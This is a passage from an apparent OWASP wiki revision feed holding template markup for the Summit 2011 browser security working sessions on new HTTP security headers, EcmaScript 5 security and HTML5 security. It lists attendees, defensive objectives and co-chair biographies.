| summit_session_attendee_company19=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed19=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name20 = &lt;br /&gt;
| summit_session_attendee_email20 = &lt;br /&gt;
| summit_session_attendee_company20=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed20=&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
| summit_track_logo = [[Image:T._browser_security.jpg]]&lt;br /&gt;
| summit_ws_logo = [[Image:WS._browser_security.jpg]]&lt;br /&gt;
| summit_session_name = New HTTP Header&lt;br /&gt;
| summit_session_url = http://www.owasp.org/index.php/Summit_2011_Working_Sessions/Session005&lt;br /&gt;
| mailing_list = https://groups.google.com/group/owasp-summit-browsersec&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| short_working_session_description= Are new opt-in HTTP headers the right way to add security features? For example:&lt;br /&gt;
* [http://tools.ietf.org/html/draft-hodges-strict-transport-sec-02 HTTP Strict Transport Security] for enforced HTTPS (supported in Chrome 4, Firefox+NoScript, Firefox 4 and up)&lt;br /&gt;
* [http://blogs.msdn.com/b/ie/archive/2009/01/27/ie8-security-part-vii-clickjacking-defenses.aspx X-Frame-Options] for non-framing (supported in IE8, FF3.6, Safari 4, Opera 10.5, Chrome 4 and up)&lt;br /&gt;
* [https://developer.mozilla.org/en/Introducing_Content_Security_Policy Content Security Policy] for whitelisting of script and media sources (supported in Firefox 4 and up)&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| related_project_name1 = Browser Security Track - main page&lt;br /&gt;
| related_project_url_1 = http://www.owasp.org/index.php/Category:Summit_2011_Browser_Security_Track&lt;br /&gt;
&lt;br /&gt;
| related_project_name2 = Google Group for the Browser Security Track&lt;br /&gt;
| related_project_url_2 = https://groups.google.com/group/owasp-summit-browsersec&lt;br /&gt;
&lt;br /&gt;
| related_project_name3 = &lt;br /&gt;
| related_project_url_3 = &lt;br /&gt;
&lt;br /&gt;
| related_project_name4 = &lt;br /&gt;
| related_project_url_4 = &lt;br /&gt;
&lt;br /&gt;
| related_project_name5 = &lt;br /&gt;
| related_project_url_5 = &lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| summit_session_objective_name1= &lt;br /&gt;
&lt;br /&gt;
| summit_session_objective_name2 = &lt;br /&gt;
&lt;br /&gt;
| summit_session_objective_name3 = &lt;br /&gt;
&lt;br /&gt;
| summit_session_objective_name4 =  &lt;br /&gt;
&lt;br /&gt;
| summit_session_objective_name5 =  &lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| working_session_date_and_time = Tuesday, 09 February &amp;lt;br&amp;gt; Time: TBA&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| discussion_model = The working form will most probably be short presentations to frame the topic and then round table discussions. Depending on number of attendees we'll break into groups.&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| operational_resources = Projector, whiteboards, markers, Internet connectivity, power&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| working_session_additional_details = &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Co-chair John Wilander===&lt;br /&gt;
[http://www.owasp.org/index.php/User:John.wilander John Wilander] is chapter co-leader in Sweden and ran the AppSec conference in Stockholm 2010. He is still [http://www.ida.liu.se/~johwi/research_publications/ pursuing his PhD in software security] and works as an appsec consultant in media/banking/healthcare.&lt;br /&gt;
&lt;br /&gt;
===Co-chair Michael Coates===&lt;br /&gt;
[http://www.owasp.org/index.php/User:MichaelCoates Michael Coates] is a long-time OWASP contributor and leader, as well as a Mozilla employee. He leads the [http://www.owasp.org/index.php/Category:OWASP_AppSensor_Project AppSensor] and the [http://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet TLS Cheat Sheet] project.&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|summit_session_deliverable_name1 =  Browser Security Report&lt;br /&gt;
|summit_session_deliverable_url_1 = &lt;br /&gt;
&lt;br /&gt;
|summit_session_deliverable_name2 = Browser Security Priority List&lt;br /&gt;
|summit_session_deliverable_url_2 = &lt;br /&gt;
&lt;br /&gt;
|summit_session_deliverable_name3 = &lt;br /&gt;
|summit_session_deliverable_url_3 = &lt;br /&gt;
&lt;br /&gt;
|summit_session_deliverable_name4 = &lt;br /&gt;
|summit_session_deliverable_url_4 = &lt;br /&gt;
&lt;br /&gt;
|summit_session_deliverable_name5 = &lt;br /&gt;
|summit_session_deliverable_url_5 = &lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| summit_session_leader_name1 = John Wilander&lt;br /&gt;
| summit_session_leader_email1 = john.wilander@owasp.org&lt;br /&gt;
&lt;br /&gt;
| summit_session_leader_name2 = Michal Coates&lt;br /&gt;
| summit_session_leader_email2 = michael.coates@owasp.org&lt;br /&gt;
&lt;br /&gt;
| summit_session_leader_name3 =&lt;br /&gt;
| summit_session_leader_email3 = &lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| operational_leader_name1 = John Wilander&lt;br /&gt;
| operational_leader_email1 = john.wilander@owasp.org&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
| meeting_notes = &lt;br /&gt;
|-&lt;br /&gt;
| session_name_mask = &amp;lt;!--Please replace DO NOT EDIT this string --&amp;gt; Session005&lt;br /&gt;
| session_home_page = &amp;lt;!--Please replace DO NOT EDIT this string --&amp;gt; Summit_2011_Working_Sessions/Session005&lt;br /&gt;
}}&lt;br /&gt;
&amp;lt;/includeonly&amp;gt;&lt;/div&gt;</summary>
		<author><name>Wisec</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Summit_2011_Working_Sessions/Session003&amp;diff=101833</id>
		<title>Summit 2011 Working Sessions/Session003</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Summit_2011_Working_Sessions/Session003&amp;diff=101833"/>
				<updated>2011-01-25T09:46:19Z</updated>
		
		<summary type="html">&lt;p&gt;Wisec: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:&amp;lt;includeonly&amp;gt;{{{1}}}&amp;lt;/includeonly&amp;gt;&amp;lt;noinclude&amp;gt;Summit 2011 Working Sessions test tab&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name1 = John Wilander&lt;br /&gt;
| summit_session_attendee_email1 = john.wilander@owasp.org&lt;br /&gt;
| summit_session_attendee_company1=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed1=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name2 = Michael Coates&lt;br /&gt;
| summit_session_attendee_email2 = &lt;br /&gt;
| summit_session_attendee_company2=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed2=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name3 = Colin Watson&lt;br /&gt;
| summit_session_attendee_email3 = &lt;br /&gt;
| summit_session_attendee_company3=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed3=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name4 = Stefano Di Paola&lt;br /&gt;
| summit_session_attendee_email4 = &lt;br /&gt;
| summit_session_attendee_company4=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed4=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name5 = &lt;br /&gt;
| summit_session_attendee_email5 = &lt;br /&gt;
| summit_session_attendee_company5=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed5=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name6 = &lt;br /&gt;
| summit_session_attendee_email6 = &lt;br /&gt;
| summit_session_attendee_company6=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed6=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name7 = &lt;br /&gt;
| summit_session_attendee_email7 = &lt;br /&gt;
| summit_session_attendee_company7=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed7=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name8 = &lt;br /&gt;
| summit_session_attendee_email8 = &lt;br /&gt;
| summit_session_attendee_company8=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed8=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name9 = &lt;br /&gt;
| summit_session_attendee_email9 = &lt;br /&gt;
| summit_session_attendee_company9=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed9=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name10 = &lt;br /&gt;
| summit_session_attendee_email10 = &lt;br /&gt;
| summit_session_attendee_company10=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed10=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name11 = &lt;br /&gt;
| summit_session_attendee_email11 = &lt;br /&gt;
| summit_session_attendee_company11=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed11=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name12 = &lt;br /&gt;
| summit_session_attendee_email12 = &lt;br /&gt;
| summit_session_attendee_company12=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed12=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name13 = &lt;br /&gt;
| summit_session_attendee_email13 = &lt;br /&gt;
| summit_session_attendee_company13=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed13=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name14 = &lt;br /&gt;
| summit_session_attendee_email14 = &lt;br /&gt;
| summit_session_attendee_company14=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed14= &lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name15 = &lt;br /&gt;
| summit_session_attendee_email15 = &lt;br /&gt;
| summit_session_attendee_company15=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed15=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name16 = &lt;br /&gt;
| summit_session_attendee_email16 = &lt;br /&gt;
| summit_session_attendee_company16=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed16=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name17 = &lt;br /&gt;
| summit_session_attendee_email17 = &lt;br /&gt;
| summit_session_attendee_company17=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed17=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name18 = &lt;br /&gt;
| summit_session_attendee_email18 = &lt;br /&gt;
| summit_session_attendee_company18=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed18=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name19 = &lt;br /&gt;
| summit_session_attendee_email19 = &lt;br /&gt;
| summit_session_attendee_company19=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed19=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name20 = &lt;br /&gt;
| summit_session_attendee_email20 = &lt;br /&gt;
| summit_session_attendee_company20=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed20=&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
| summit_track_logo = [[Image:T._browser_security.jpg]]&lt;br /&gt;
| summit_ws_logo = [[Image:WS._browser_security.jpg]]&lt;br /&gt;
| summit_session_name = EcmaScript 5 Security&lt;br /&gt;
| summit_session_url = http://www.owasp.org/index.php/Summit_2011_Working_Sessions/Session003&lt;br /&gt;
| mailing_list = https://groups.google.com/group/owasp-summit-browsersec&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| short_working_session_description= &lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| related_project_name1 = Browser Security Track - main page&lt;br /&gt;
| related_project_url_1 = http://www.owasp.org/index.php/Category:Summit_2011_Browser_Security_Track&lt;br /&gt;
&lt;br /&gt;
| related_project_name2 = Google Group for the Browser Security Track&lt;br /&gt;
| related_project_url_2 = https://groups.google.com/group/owasp-summit-browsersec&lt;br /&gt;
&lt;br /&gt;
| related_project_name3 = &lt;br /&gt;
| related_project_url_3 = &lt;br /&gt;
&lt;br /&gt;
| related_project_name4 = &lt;br /&gt;
| related_project_url_4 = &lt;br /&gt;
&lt;br /&gt;
| related_project_name5 = &lt;br /&gt;
| related_project_url_5 = &lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| summit_session_objective_name1= '''Fix the problems with Object.defineProperty() and property unsealing / [https://bugzilla.mozilla.org/show_bug.cgi?id=588138 double-freezing]'''.&amp;lt;noinclude&amp;gt; Implement it if not yet done.&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
&lt;br /&gt;
| summit_session_objective_name2 = &amp;lt;noinclude&amp;gt;'''Goal I''': &amp;lt;/noinclude&amp;gt;Raise awareness for the power or object freezing in a security context. &amp;lt;noinclude&amp;gt;ES5 can really make a change here.&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
&lt;br /&gt;
| summit_session_objective_name3 = &amp;lt;noinclude&amp;gt;'''Goal II''':&amp;lt;/noinclude&amp;gt; Raise awareness in seeing the DOM as the place where XSS attacks actually take place - and where they should be prevented. &amp;lt;noinclude&amp;gt; CSP is a great yet still immature start - but worth discussing and extending. Discuss specification drafts for a secure DOM and easy to configure capability profiles with reasonable and quantitative proofs of concept.&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
&lt;br /&gt;
| summit_session_objective_name4 = '''Long Term Goal''': Discuss the possibility of vendor supported client side security mechanisms. &amp;lt;noinclude&amp;gt;Client side IDS/IPS based on ES5 can be possible - yet have to be designed and specified. &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
&lt;br /&gt;
| summit_session_objective_name5 =  &lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| working_session_date_and_time = Tuesday, 09 February &amp;lt;br&amp;gt; Time: TBA&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| discussion_model = The working form will most probably be short presentations to frame the topic and then round table discussions. Depending on number of attendees we'll break into groups.&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| operational_resources = Projector, whiteboards, markers, Internet connectivity, power&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| working_session_additional_details = &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Co-chair Mario Heiderich===&lt;br /&gt;
Mario Heiderich works as a researcher for the Ruhr-University in Bochum, Germany and currently focuses on HTML5, SVG security and security implications of the ES5 specification draft. Mario invoked the [http://html5sec.org/ HTML5 security cheat-sheet] and maintains the [http://php-ids.org/ PHPIDS filter rules]. In his spare time he delivers trainings and security consultancy for larger German and international companies. He is also one of the co-authors of [http://www.amazon.com/Web-Application-Obfuscation-WAFs-Evasion-Filters-alert/dp/1597496049 Web Application Obfuscation: '-/WAFs..Evasion..Filters//alert(/Obfuscation/)-'] – a book on how an attacker would bypass different types of security controls including IDS/IPS.&lt;br /&gt;
&lt;br /&gt;
===Co-chair 2===&lt;br /&gt;
To be confirmed.&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|summit_session_deliverable_name1 =  Browser Security Report&lt;br /&gt;
|summit_session_deliverable_url_1 = &lt;br /&gt;
&lt;br /&gt;
|summit_session_deliverable_name2 = Browser Security Priority List&lt;br /&gt;
|summit_session_deliverable_url_2 = &lt;br /&gt;
&lt;br /&gt;
|summit_session_deliverable_name3 = &lt;br /&gt;
|summit_session_deliverable_url_3 = &lt;br /&gt;
&lt;br /&gt;
|summit_session_deliverable_name4 = &lt;br /&gt;
|summit_session_deliverable_url_4 = &lt;br /&gt;
&lt;br /&gt;
|summit_session_deliverable_name5 = &lt;br /&gt;
|summit_session_deliverable_url_5 = &lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| summit_session_leader_name1 = Mario Heiderich&lt;br /&gt;
| summit_session_leader_email1 = &lt;br /&gt;
&lt;br /&gt;
| summit_session_leader_name2 = TBC&lt;br /&gt;
| summit_session_leader_email2 = &lt;br /&gt;
&lt;br /&gt;
| summit_session_leader_name3 =&lt;br /&gt;
| summit_session_leader_email3 = &lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| operational_leader_name1 = John Wilander&lt;br /&gt;
| operational_leader_email1 = john.wilander@owasp.org&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
| meeting_notes = &lt;br /&gt;
|-&lt;br /&gt;
| session_name_mask = &amp;lt;!--Please replace DO NOT EDIT this string --&amp;gt; Session003&lt;br /&gt;
| session_home_page = &amp;lt;!--Please replace DO NOT EDIT this string --&amp;gt; Summit_2011_Working_Sessions/Session003&lt;br /&gt;
}}&lt;br /&gt;
&amp;lt;/includeonly&amp;gt;&lt;/div&gt;</summary>
		<author><name>Wisec</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Summit_2011_Working_Sessions/Session002&amp;diff=101832</id>
		<title>Summit 2011 Working Sessions/Session002</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Summit_2011_Working_Sessions/Session002&amp;diff=101832"/>
				<updated>2011-01-25T09:45:55Z</updated>
		
		<summary type="html">&lt;p&gt;Wisec: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:&amp;lt;includeonly&amp;gt;{{{1}}}&amp;lt;/includeonly&amp;gt;&amp;lt;noinclude&amp;gt;Summit 2011 Working Sessions test tab&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name1 = John Wilander&lt;br /&gt;
| summit_session_attendee_email1 = john.wilander@owasp.org&lt;br /&gt;
| summit_session_attendee_company1=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed1=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name2 = Michael Coates&lt;br /&gt;
| summit_session_attendee_email2 = &lt;br /&gt;
| summit_session_attendee_company2=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed2=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name3 = Colin Watson&lt;br /&gt;
| summit_session_attendee_email3 = &lt;br /&gt;
| summit_session_attendee_company3=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed3=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name4 = Stefano Di Paola&lt;br /&gt;
| summit_session_attendee_email4 = &lt;br /&gt;
| summit_session_attendee_company4=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed4=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name5 = &lt;br /&gt;
| summit_session_attendee_email5 = &lt;br /&gt;
| summit_session_attendee_company5=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed5=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name6 = &lt;br /&gt;
| summit_session_attendee_email6 = &lt;br /&gt;
| summit_session_attendee_company6=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed6=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name7 = &lt;br /&gt;
| summit_session_attendee_email7 = &lt;br /&gt;
| summit_session_attendee_company7=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed7=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name8 = &lt;br /&gt;
| summit_session_attendee_email8 = &lt;br /&gt;
| summit_session_attendee_company8=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed8=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name9 = &lt;br /&gt;
| summit_session_attendee_email9 = &lt;br /&gt;
| summit_session_attendee_company9=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed9=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name10 = &lt;br /&gt;
| summit_session_attendee_email10 = &lt;br /&gt;
| summit_session_attendee_company10=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed10=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name11 = &lt;br /&gt;
| summit_session_attendee_email11 = &lt;br /&gt;
| summit_session_attendee_company11=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed11=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name12 = &lt;br /&gt;
| summit_session_attendee_email12 = &lt;br /&gt;
| summit_session_attendee_company12=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed12=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name13 = &lt;br /&gt;
| summit_session_attendee_email13 = &lt;br /&gt;
| summit_session_attendee_company13=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed13=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name14 = &lt;br /&gt;
| summit_session_attendee_email14 = &lt;br /&gt;
| summit_session_attendee_company14=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed14= &lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name15 = &lt;br /&gt;
| summit_session_attendee_email15 = &lt;br /&gt;
| summit_session_attendee_company15=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed15=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name16 = &lt;br /&gt;
| summit_session_attendee_email16 = &lt;br /&gt;
| summit_session_attendee_company16=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed16=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name17 = &lt;br /&gt;
| summit_session_attendee_email17 = &lt;br /&gt;
| summit_session_attendee_company17=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed17=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name18 = &lt;br /&gt;
| summit_session_attendee_email18 = &lt;br /&gt;
| summit_session_attendee_company18=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed18=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name19 = &lt;br /&gt;
| summit_session_attendee_email19 = &lt;br /&gt;
| summit_session_attendee_company19=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed19=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name20 = &lt;br /&gt;
| summit_session_attendee_email20 = &lt;br /&gt;
| summit_session_attendee_company20=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed20=&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
| summit_track_logo = [[Image:T._browser_security.jpg]]&lt;br /&gt;
| summit_ws_logo = [[Image:WS._browser_security.jpg]]&lt;br /&gt;
| summit_session_name = HTML5 Security&lt;br /&gt;
| summit_session_url = http://www.owasp.org/index.php/Summit_2011_Working_Sessions/Session002&lt;br /&gt;
| mailing_list = https://groups.google.com/group/owasp-summit-browsersec&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| short_working_session_description= &lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| related_project_name1 = Browser Security Track - main page&lt;br /&gt;
| related_project_url_1 = http://www.owasp.org/index.php/Category:Summit_2011_Browser_Security_Track&lt;br /&gt;
&lt;br /&gt;
| related_project_name2 = Google Group for the Browser Security Track&lt;br /&gt;
| related_project_url_2 = https://groups.google.com/group/owasp-summit-browsersec&lt;br /&gt;
&lt;br /&gt;
| related_project_name3 = &lt;br /&gt;
| related_project_url_3 = &lt;br /&gt;
&lt;br /&gt;
| related_project_name4 = &lt;br /&gt;
| related_project_url_4 = &lt;br /&gt;
&lt;br /&gt;
| related_project_name5 = &lt;br /&gt;
| related_project_url_5 = &lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| summit_session_objective_name1= '''Handle autofocus in a unified and secure way'''.&amp;lt;noinclude&amp;gt; Make sure SOP applies for autofocus usage in frame/iframe'd websites. Re-discuss necessity for (future) attributes like this.&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
&lt;br /&gt;
| summit_session_objective_name2 = '''Discuss necessity and capability for the HTML5 form controls'''.&amp;lt;noinclude&amp;gt; Do we need a non-SOP formaction attribute and why? &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
&lt;br /&gt;
| summit_session_objective_name3 = &amp;lt;noinclude&amp;gt;'''Goal I''':&amp;lt;/noinclude&amp;gt;  Initiate and create documentation and references for developers that address security issues. &amp;lt;noinclude&amp;gt;Html5sec.org is a start but impossible to continue or extend large scale without vendor help&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
&lt;br /&gt;
| summit_session_objective_name4 = &amp;lt;noinclude&amp;gt;'''Goal II''':&amp;lt;/noinclude&amp;gt;Discuss and heavily restrict SVG capabilities - especially when deployed in CSS backgrounds and &amp;lt;img&amp;gt; tags. &amp;lt;noinclude&amp;gt;Mainly Opera and Mozilla are addressed here.&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
&lt;br /&gt;
| summit_session_objective_name5 =   '''Long Term Goal(s)''': Provide a working and easy to use as well as vendor supported HTML5 compliant filter software such as HTMLPurifier. &amp;lt;noinclude&amp;gt;Browser vendors should participate in creating security software and filters - not undermine them as we could experience in the last decade.&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| working_session_date_and_time = Tuesday, 09 February &amp;lt;br&amp;gt; Time: TBA&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| discussion_model = The working form will most probably be short presentations to frame the topic and then round table discussions. Depending on number of attendees we'll break into groups.&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| operational_resources = Projector, whiteboards, markers, Internet connectivity, power&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| working_session_additional_details = &amp;lt;br&amp;gt;&lt;br /&gt;
  &lt;br /&gt;
[[Image:Html5_mario_hackvertor.jpg‎‎]]&lt;br /&gt;
&lt;br /&gt;
===Co-chair Mario Heiderich===&lt;br /&gt;
Mario Heiderich works as a researcher for the Ruhr-University in Bochum, Germany and currently focuses on HTML5, SVG security and security implications of the ES5 specification draft. Mario invoked the [http://html5sec.org/ HTML5 security cheat-sheet] and maintains the [http://php-ids.org/ PHPIDS filter rules]. In his spare time he delivers trainings and security consultancy for larger German and international companies. He is also one of the co-authors of [http://www.amazon.com/Web-Application-Obfuscation-WAFs-Evasion-Filters-alert/dp/1597496049 Web Application Obfuscation: '-/WAFs..Evasion..Filters//alert(/Obfuscation/)-'] – a book on how an attacker would bypass different types of security controls including IDS/IPS.&lt;br /&gt;
&lt;br /&gt;
===Co-chair Gareth Heyes===&lt;br /&gt;
Gareth &amp;quot;Gaz&amp;quot; Heyes calls himself Chief Conspiracy theorist and is affiliated with Microsoft. He is the designer and developer behind [http://www.owasp.org/index.php/OWASP_JavaScript_Sandboxes#tab=JSReg JSReg] – a Javascript sandbox which converts code using regular expressions; [http://www.owasp.org/index.php/OWASP_JavaScript_Sandboxes#tab=HTMLReg HTMLReg] &amp;amp; [http://www.owasp.org/index.php/OWASP_JavaScript_Sandboxes#tab=CSSReg CSSReg] – converters of malicious HTML/CSS into a safe form of HTML. He is also one of the co-authors of [http://www.amazon.com/Web-Application-Obfuscation-WAFs-Evasion-Filters-alert/dp/1597496049 Web Application Obfuscation: '-/WAFs..Evasion..Filters//alert(/Obfuscation/)-'] – a book on how an attacker would bypass different types of security controls including IDS/IPS.&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|summit_session_deliverable_name1 =  Browser Security Report&lt;br /&gt;
|summit_session_deliverable_url_1 = &lt;br /&gt;
&lt;br /&gt;
|summit_session_deliverable_name2 = Browser Security Priority Report&lt;br /&gt;
|summit_session_deliverable_url_2 = &lt;br /&gt;
&lt;br /&gt;
|summit_session_deliverable_name3 = &lt;br /&gt;
|summit_session_deliverable_url_3 = &lt;br /&gt;
&lt;br /&gt;
|summit_session_deliverable_name4 = &lt;br /&gt;
|summit_session_deliverable_url_4 = &lt;br /&gt;
&lt;br /&gt;
|summit_session_deliverable_name5 = &lt;br /&gt;
|summit_session_deliverable_url_5 = &lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| summit_session_leader_name1 = Mario Heiderich&lt;br /&gt;
| summit_session_leader_email1 = &lt;br /&gt;
&lt;br /&gt;
| summit_session_leader_name2 = Gareth Heyes&lt;br /&gt;
| summit_session_leader_email2 = &lt;br /&gt;
&lt;br /&gt;
